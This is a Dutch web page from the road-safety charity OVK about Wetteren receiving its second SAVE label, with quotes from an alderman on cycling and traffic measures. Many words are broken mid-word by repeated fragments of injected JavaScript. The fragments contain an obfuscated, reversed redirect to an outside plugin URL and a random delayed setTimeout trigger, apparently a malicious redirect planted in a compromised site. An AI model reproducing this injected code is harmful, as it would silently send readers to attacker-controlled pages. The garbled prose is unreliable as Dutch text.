Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Wetteren ontvangt 2e SAVE-label

De gemeente Wetteren behoort toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de ‘anciens’ van het project SAVE Steden & Gemeenten. Wetteren was samen met Sint-Niklaas en Ravels bij de eersten die in 2011 het SAVE-charter ondertekenden. Ook waren ze in 2013 de eerste die het SAVE-label in ontvangst namen. Daarnaast is Wetteren het eerste voorbeeld van ‘het SAVE-sneeuwbaleffect’. Een voorbeeld van hoe door het instappen van de ene gemeente ook de andere gemeentes uit de buurt dat voorbeeld volgen. De zone Wetteren-Laarne-Wichelen was de eerste volledige politiezone, alle gemeenten stapten na verloop van tijd in het SAVE-project.

Sinds het eerste SAVE-label in 2013 werd in een tweede actieplan opnieuw heel wat acties ondernomen voor veiliger verkeer.  “Een belangrijk project was het autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to­vrij maken van de spoorwegtunnel in de Victoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor Van Sandelaan en de Warandelaan. Het bestuur duwde de beslissing toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch door ondanks protest van een aantal omwonen­den.” “Vraag aan mensen of ze verkeersveilig­heid belangrijk vinden en iedereen zegt ja, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot je maatregelen begint te nemen”, zegt schepen van Mobiliteit Herman De Wulf. “Toen we de spoorwegtunnel afsloten na de treinramp bleek 500 meter omrijden een drama. Wij hebben gekozen voor de veiligheid van fietsers. Het past ook mooi bij de veilige ‘fietsostrade’ tussen Wetteren en Schellebelle. Nog een voor­beeld is het parkeervrij maken van de Nieuwsstraat. Ook daar kwam protest, maar wij vinden de situatie voor de fietsers veiliger als ze niet meer moeten slalommen tussen geparkeerde voertuigen. We blijven maatregelen nemen om de zwakke weggebruiker tegemoet te komen.”

Er is al een derde actieplan voor Wetteren ondertussen. De komende jaren focust de gemeente en de politiezone onder andere op een coherent snelheidsbeleid met aandacht voor de zwakke weggebruiker met extra fietsstraten en zones 30. “Iedereen vindt de verkeersveiligheid heel belangrijk en helaas staan de kranten nog dagelijks vol met zware ongevallen en dodelijke slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers met vluchtmisdrijven. Maar zodra we een actie ondernemen, moeten we toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch ook altijd protest slikken. Als bestuur gaan we ons echter niet laten afschrikken en hopen we ook op een betere samenwerking met het Agentschap Wegen en Verkeer. Dossiers als de N462 en Kapellendries zouden prioriteit moeten hebben maar nu moeten wij als gemeente jarenlang dossiers en onteigeningen vooraf financieren eer er iets beweegt op Vlaams niveau”, weet schepen van mobiliteit Herman De Wulf.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be